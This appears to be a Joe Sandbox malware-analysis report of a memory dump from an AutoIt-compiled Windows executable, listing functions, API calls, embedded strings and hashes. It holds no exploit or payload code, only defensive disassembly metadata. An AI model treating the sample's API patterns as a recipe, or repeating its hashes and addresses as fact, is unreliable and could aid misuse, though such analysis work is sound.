Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
API String ID: 169749273-762882726
Opcode ID: b99b5a57fa29b0bf459006c6a7c00542c31fa825d637ccc2402dd2429a40327a
Instruction ID: cf4a6c8f4dccd555df5a3f5ae5eab2df5cddb9816ee30ef26cce0cb8429fd3e9
Opcode Fuzzy Hash: b99b5a57fa29b0bf459006c6a7c00542c31fa825d637ccc2402dd2429a40327a
Instruction Fuzzy Hash: 1C614B71108304AFC701DF64DC85DAFBBF8EF99710F00492DF699961A2DB709A89CB92

Function 0014B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0014B23F

Strings

HANDLE=, xrefs: 0014B238
REGEXP=, xrefs: 0014B254
[ALL, xrefs: 0014B2E5
LAST, xrefs: 0014B204
[HANDLE:, xrefs: 0014B24B
ACTIVE, xrefs: 0014B21A
[CLASS:, xrefs: 0014B28F
ALL, xrefs: 0014B2D3
[REGEXPTITLE:, xrefs: 0014B267
[LAST, xrefs: 0014B2EC
CLASSNAME=, xrefs: 0014B27C
[ACTIVE, xrefs: 0014B22C

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: fd21816c460d59a6e9b2e54ef080807b1e9e433f5ddf7efb4773825d867afefa
Instruction ID: b42005194b77109cc4b0da320b65cd0ede80e82d5ce30d6dfedbf0ac9b6c8e85
Opcode Fuzzy Hash: fd21816c460d59a6e9b2e54ef080807b1e9e433f5ddf7efb4773825d867afefa
Instruction Fuzzy Hash: F231D234A08209A6DB18FE60CD83EFE77B8AF25750F600029F515724E7EFA1AE44D552

Function 00174619 Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 001746AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001746F6

Strings

SELECT, xrefs: 001748A7
@U=u, xrefs: 001746F6
GETTEXT, xrefs: 00174849
ISCHECKED, xrefs: 00174879
EXPAND, xrefs: 001747A8
COLLAPSE, xrefs: 0017473C
CHECK, xrefs: 00174716
GETITEMCOUNT, xrefs: 001747D8
EXISTS, xrefs: 0017475F
GETSELECTED, xrefs: 00174806
UNCHECK, xrefs: 001748D2
GETTOTALCOUNT, xrefs: 001746DD

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-383632319
Opcode ID: 7c29f2111df6182fb412ed45fa542974ecec4b737f4540a9301fe0fdac6b63ad
Instruction ID: f302b8c32c6919452fa48e633cb7b22d4afe691f3de7550daa51dee48ce37c80
Opcode Fuzzy Hash: 7c29f2111df6182fb412ed45fa542974ecec4b737f4540a9301fe0fdac6b63ad
Instruction Fuzzy Hash: DB91A1346083058FCB18EF50C451AAEB7A1BF59314F05846CF99A5B7A3DB70ED4ADB82

Function 0017BAB8 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0017BB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00176D80,?), ref: 0017BBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0017BC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0017BC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0017BC7D
FreeLibrary.KERNEL32(?), ref: 0017BC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0017BC99
DestroyIcon.USER32(?), ref: 0017BCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0017BCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0017BCD1

Part of subcall function 0011313D: __wcsicmp_l.LIBCMT ref: 001131C6

Strings

.dll, xrefs: 0017BB27
@U=u, xrefs: 0017BCB1
.icl, xrefs: 0017BAE4
.exe, xrefs: 0017BB04

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl$@U=u
API String ID: 1212759294-1639919054
Opcode ID: edbce833c5746b4b43e94134659f78e2803365cb3dca57a1271370974669223b
Instruction ID: eecbee17a803bf4e8ec2b28a326bc66bc193570aa8bc4241bc6cadc6e0e68bc4
Opcode Fuzzy Hash: edbce833c5746b4b43e94134659f78e2803365cb3dca57a1271370974669223b
Instruction Fuzzy Hash: 0361BF71508219BAEB18DF64CC86FFA77B8EF08720F108119F919D61D1DB74AA90DBA0

Function 0015A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C

CharLowerBuffW.USER32(?,?), ref: 0015A636
GetDriveTypeW.KERNEL32 ref: 0015A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0015A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0015A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0015A730

Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66

Strings

set cd door , xrefs: 0015A6D1
closed, xrefs: 0015A64A, 0015A653
open , xrefs: 0015A692
type cdaudio alias cd wait, xrefs: 0015A6AE
close, xrefs: 0015A63C
open, xrefs: 0015A65D
close cd wait, xrefs: 0015A71B
wait, xrefs: 0015A6ED

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 3d8567b54b5f1332de49ea29ece10660f210dd2c227a0889827d9918535d5236
Instruction ID: 2e07da960a6cb07a0758d9b4881b27af5aaa41e12a53e34659d1cd82ffbf13e9
Opcode Fuzzy Hash: 3d8567b54b5f1332de49ea29ece10660f210dd2c227a0889827d9918535d5236
Instruction Fuzzy Hash: 38517A751043099FC700EF20C9819AAB7F4FF98718F44496DF99A57662DB31AE0ACF92

Function 0015A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0015A47A
__swprintf.LIBCMT ref: 0015A49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 0015A4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0015A4FE
_memset.LIBCMT ref: 0015A51D
_wcsncpy.LIBCMT ref: 0015A559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0015A58E
CloseHandle.KERNEL32(00000000), ref: 0015A599
RemoveDirectoryW.KERNEL32(?), ref: 0015A5A2
CloseHandle.KERNEL32(00000000), ref: 0015A5AC

Strings

\, xrefs: 0015A4B2
\??\%s, xrefs: 0015A496
:, xrefs: 0015A4BD

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: c9d8f1f4191421f01502c893782e2d561098a3c29cf4e3c4c553ad666f253f7a
Instruction ID: d4c34c7920c1b3325bc4921abc4d22409b7af874e23f97c28ec7d8421ce2a473
Opcode Fuzzy Hash: c9d8f1f4191421f01502c893782e2d561098a3c29cf4e3c4c553ad666f253f7a
Instruction Fuzzy Hash: 7431B275544219ABDB20DFA0DC48FEB37BCEF88701F5041BAF919D6150E77096858B25

Function 0017C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0017C4EC
GetFocus.USER32 ref: 0017C4FC
GetDlgCtrlID.USER32(00000000), ref: 0017C507
_memset.LIBCMT ref: 0017C632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0017C65D
GetMenuItemCount.USER32(?), ref: 0017C67D
GetMenuItemID.USER32(?,00000000), ref: 0017C690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0017C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0017C70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0017C744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0017C779

Strings

0, xrefs: 0017C62A

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 1ee6e52534214048958c0d2ae0baa0c4af1f6858f356f404e11f0dbcf4b704e0
Instruction ID: 5fe471250664d2c3dd53482974dac69a39938bac7209cb9e97c983adb7281f43
Opcode Fuzzy Hash: 1ee6e52534214048958c0d2ae0baa0c4af1f6858f356f404e11f0dbcf4b704e0
Instruction Fuzzy Hash: A0819E70608301AFD714CF14C984AABBBF8FB98314F10852DF99997291DB71D985CFA2

Function 001483F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0014874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00148766
Part of subcall function 0014874A: GetLastError.KERNEL32(?,0014822A,?,?,?), ref: 00148770
Part of subcall function 0014874A: GetProcessHeap.KERNEL32(00000008,?,?,0014822A,?,?,?), ref: 0014877F
Part of subcall function 0014874A: HeapAlloc.KERNEL32(00000000,?,0014822A,?,?,?), ref: 00148786
Part of subcall function 0014874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0014879D

Part of subcall function 001487E7: GetProcessHeap.KERNEL32(00000008,00148240,00000000,00000000,?,00148240,?), ref: 001487F3
Part of subcall function 001487E7: HeapAlloc.KERNEL32(00000000,?,00148240,?), ref: 001487FA
Part of subcall function 001487E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00148240,?), ref: 0014880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00148458
_memset.LIBCMT ref: 0014846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0014848C
GetLengthSid.ADVAPI32(?), ref: 0014849D
GetAce.ADVAPI32(?,00000000,?), ref: 001484DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001484F6
GetLengthSid.ADVAPI32(?), ref: 00148513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00148522
HeapAlloc.KERNEL32(00000000), ref: 00148529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0014854A
CopySid.ADVAPI32(00000000), ref: 00148551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00148582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001485A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 001485BC

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 365533409a453183f1cdd711cf2dd96442d6c173ccab574c98532f302c0a2ebe
Instruction ID: d895895e75a4e4f875bb5f6d1333e30c535b78f20684e301ebf7769f6701fc70
Opcode Fuzzy Hash: 365533409a453183f1cdd711cf2dd96442d6c173ccab574c98532f302c0a2ebe
Instruction Fuzzy Hash: 1561387190021AAFDF10DFA4DC45AEEBBB9FF04304F148269F915AB2A1DB319A45DF60

Function 0016762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 001676A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 001676AE
CreateCompatibleDC.GDI32(?), ref: 001676BA
SelectObject.GDI32(00000000,?), ref: 001676C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0016771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00167757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0016777B
SelectObject.GDI32(00000006,?), ref: 00167783
DeleteObject.GDI32(?), ref: 0016778C
DeleteDC.GDI32(00000006), ref: 00167793
ReleaseDC.USER32(00000000,?), ref: 0016779E

Strings

(, xrefs: 00167723

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: b85b43d520a5325c1df7c9e4b63a6aa7366827920f14f9d3ba5d1f35b7768a27
Instruction ID: 957edaa905a1985c631fc04b88cc33864103ce8e1829480fd2b6006176fd7cd6
Opcode Fuzzy Hash: b85b43d520a5325c1df7c9e4b63a6aa7366827920f14f9d3ba5d1f35b7768a27
Instruction Fuzzy Hash: DF515775904209EFDB15CFA8CC88EAFBBB9EF48710F14842DF94A97250D731A881CB60

Function 0015A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,0017FB78), ref: 0015A0FC

Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 0015A11E
__swprintf.LIBCMT ref: 0015A177
__swprintf.LIBCMT ref: 0015A190
_wprintf.LIBCMT ref: 0015A246
_wprintf.LIBCMT ref: 0015A264

Strings

Error: , xrefs: 0015A20E
"%s" (%d) : ==> %s:, xrefs: 0015A25F
Line %d (File "%s"):, xrefs: 0015A171, 0015A18A
"%s" (%d) : ==> %s:%s%s, xrefs: 0015A241
^ ERROR, xrefs: 0015A1E8

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 5454aa929b76f3835fe0728cd5bf4d1b5900488943936de519698ade8f6dabb7
Instruction ID: 809dda5b22cdc79352cffc7a54bd60f96ab8de50f68f0182e090a756bf29ef21
Opcode Fuzzy Hash: 5454aa929b76f3835fe0728cd5bf4d1b5900488943936de519698ade8f6dabb7
Instruction Fuzzy Hash: CE51803194020DAADF15EBE0CD86EFEB779AF14300F500265F619625A2DB316F98DB52

Function 00155217 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0015521C

Part of subcall function 00110719: timeGetTime.WINMM(?,753DB400,00100FF9), ref: 0011071D

Sleep.KERNEL32(0000000A), ref: 00155248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0015526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0015528E
SetActiveWindow.USER32 ref: 001552AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001552BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 001552DA
Sleep.KERNEL32(000000FA), ref: 001552E5
IsWindow.USER32 ref: 001552F1
EndDialog.USER32(00000000), ref: 00155302

Strings

@U=u, xrefs: 001552BB, 001552DA
BUTTON, xrefs: 00155280

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: @U=u$BUTTON
API String ID: 1194449130-2582809321
Opcode ID: 067e4b1efcd27a28bfbca9ce37043b4b8248ad3b8bedc26a03841bbab3d56818
Instruction ID: e0957bcca40d9c581cdfb03a32100a9421dcb9bebb702e2c7490da14201ecd7e
Opcode Fuzzy Hash: 067e4b1efcd27a28bfbca9ce37043b4b8248ad3b8bedc26a03841bbab3d56818
Instruction Fuzzy Hash: 0121A170204704EFE7115B30EC98A2A3B7AFB94387F040528F8198ADB1CB61ADD9CB21

Function 000F6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00110B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,000F6C6C,?,00008000), ref: 00110BB7

Part of subcall function 000F48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000F48A1,?,?,000F37C0,?), ref: 000F48CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000F6D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 000F6E5A

Part of subcall function 000F59CD: _wcscpy.LIBCMT ref: 000F5A05

Part of subcall function 0011387D: _iswctype.LIBCMT ref: 00113885

Strings

Unterminated string, xrefs: 0012EC0D
Error opening the file, xrefs: 0012E866, 0012E8E1
AU3!, xrefs: 000F6CC1
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0012E84A
>>>AUTOIT SCRIPT<<<, xrefs: 0012E8BF
EA06, xrefs: 0012E87B
Bad directive syntax error, xrefs: 0012EBC6

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: fc641d78fa56111106531e83bd9932993c1638a183822da1300a4d5d945806f6
Instruction ID: 123ca2f3d873786fd7e6d385e188c3ac9f5f689c2ecad603c73b87b0ef91f375
Opcode Fuzzy Hash: fc641d78fa56111106531e83bd9932993c1638a183822da1300a4d5d945806f6
Instruction Fuzzy Hash: B802AC315083459FC724EF24C881AAFBBE5BF99314F04092DF68A976A2DB31D949DB43

Function 000F45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000F45F9
GetMenuItemCount.USER32(001B6890), ref: 0012D7CD
GetMenuItemCount.USER32(001B6890), ref: 0012D87D
GetCursorPos.USER32(?), ref: 0012D8C1
SetForegroundWindow.USER32(00000000), ref: 0012D8CA
TrackPopupMenuEx.USER32(001B6890,00000000,?,00000000,00000000,00000000), ref: 0012D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0012D8E9

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 8c2e469afbe4fee58d64876d135e14843481f06647a476aafb54cec4e9dc4e60
Instruction ID: 87d5c264089e4a46d8bbfd4c4668ce0df6a447605342f0fa83c41c049a1141cc
Opcode Fuzzy Hash: 8c2e469afbe4fee58d64876d135e14843481f06647a476aafb54cec4e9dc4e60
Instruction Fuzzy Hash: C071E771600219BEFB249F54EC85FABBF64FF05368F204216FA28A61E1C7B55860DB91

Function 001710A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00170038,?,?), ref: 001710BC

Strings

HKEY_USERS, xrefs: 001711BD
HKLM, xrefs: 0017113A
HKEY_CURRENT_USER, xrefs: 0017119B
HKCU, xrefs: 001711AC
HKEY_CLASSES_ROOT, xrefs: 0017114F
HKCR, xrefs: 00171164
HKCC, xrefs: 0017118A
HKEY_LOCAL_MACHINE, xrefs: 00171125
HKEY_CURRENT_CONFIG, xrefs: 00171179
HKU, xrefs: 001711CE

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
